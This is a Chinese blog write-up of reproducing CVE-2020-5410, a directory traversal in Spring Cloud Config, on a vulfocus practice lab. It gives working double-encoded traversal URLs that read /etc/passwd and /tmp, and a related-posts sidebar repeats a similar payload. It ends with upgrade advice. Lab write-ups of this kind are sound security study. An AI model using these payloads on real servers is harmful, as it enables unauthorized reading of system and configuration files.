Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest

已于 2022-04-11 09:19:51 修改
阅读量3.9k 收藏 2
点赞数
分类专栏: 复现 文章标签: 网络安全
于 2022-04-11 09:19:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/124090701
版权

0x01 描述

Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。

0x02 靶场地址

靶场地址:http://vulfocus.io/#/dashboard?image_id=3e5a30fd-4426-4619-a35f-c7ac9b18d5cb
靶场名称:vulfocus/spring-cve_2020_5410:latest
在这里插入图片描述

0x03 打靶复现

  1. 启动环境,访问url

在这里插入图片描述

  1. 构造POC
    访问etc/passwd
http://xxx.xxxx.com/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fpasswd%23foo/development

在这里插入图片描述

访问/tmp

http://xxx.xxxx.com/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development

在这里插入图片描述
成功获得flag,环境启动比较慢;访问poc时可能会失败,多试几次或者换个浏览器。
tips:
%25 ===>%
%2f =>/
%23=>#

0x04 修复建议

升级到 Spring Cloud Config 至最新版本。

Redamancy——
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现
Brucetg的博客
06-15 4936
Spring Cloud Config Spring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2264
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
漏洞复现hms SQL注入-cve_2022_25491
最新发布
qq_51780583的博客
03-26 178
医院管理系统 (HMS) 是一种基于计算机或网络的系统,有助于管理医院或任何医疗机构的运作。然后发现登录不上,再看登录选项发现只有admin/doctor/patient那就在表名里找这三个表的信息,先看admin相关登录信息。开始以为用户名是Kabir,然后后面抓包发现登录名是loginid,这里对应上就是admin,密码:123456789.通过CVE官网得知,该漏洞位于,appointment.php文件的editid参数。先判断闭合,当输入1,1'--+时正确有回显,1'时报错,说明是单引号闭合。
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
thelostworld
02-20 1677
Spring Cloud Config 目录穿越漏洞 (CVE-2020-5410) ​ 一、漏洞简介 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 二、影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cl..
[CVE-2020-5410]spring-cloud-config路径穿越导致的信息泄露
公众号shadow sock7
06-22 1443
用之前的环境即可: https://github.com/shadowsock5/spring-cloud-config-starter PoC参考: https://github.com/osamahamad/CVE-2020-5410-POC 127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development 影响范围 S
spring cloud config server目录遍历漏洞 CVE-2020-5410
weixin_47267061的博客
03-10 421
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
Spring 目录遍历CVE-2020-5410 )复现
YouthBelief的博客
11-03 861
Spring 目录遍历CVE-2020-5410Spring 目录遍历CVE-2020-5410 )0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring 目录遍历CVE-2020-5410 ) 0x01 漏洞描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9
Saltstack CVE-2020-11651和CVE-2020-11652复现
dzqxwzoe的博客
01-12 184
SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
实例226——实现遍历目录下的每个文件
05-27
实例226——实现遍历目录下的每个文件,保证可用。
CVE-2020-0688_EXP:CVE-2020-0688_EXP自动触发有效载荷和加密方法
03-20
CVE-2020-0688_EXP CVE-2020-0688_EXP自动触发有效载荷 python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-11651:CVE-2020-11651
04-15
CVE-2020-11651 在2019.2.4之前的SaltSalt Salt中发现了一个问题,在3000.2。之前的3000中发现了一个问题。 盐主进程ClearFuncs类无法正确验证方法调用。 这使远程用户无需身份验证即可访问某些方法。 这些方法可...
Spring框架漏洞合集
小小猪的博客
08-18 7761
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
[Vulfocus解题系列] Spring 目录遍历CVE-2020-5410
00勇士王子的博客
07-13 2269
漏洞介绍 名称: Spring 目录遍历CVE-2020-5410 ) 描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可
[Vulfocus解题系列]skywalking SQL注入 (CVE-2020-9483)
00勇士王子的博客
01-12 3662
描述 Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 复现过程 注:本次复现使用在线靶场http://vulfocus.fofa.so 打开环境 加上路径抓包 /graphql 改成post,加上payload,利用报错注入
vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现
一剑开天门!的博客
02-26 2749
vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现(由于本人现在还比较菜,勿喷!)
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值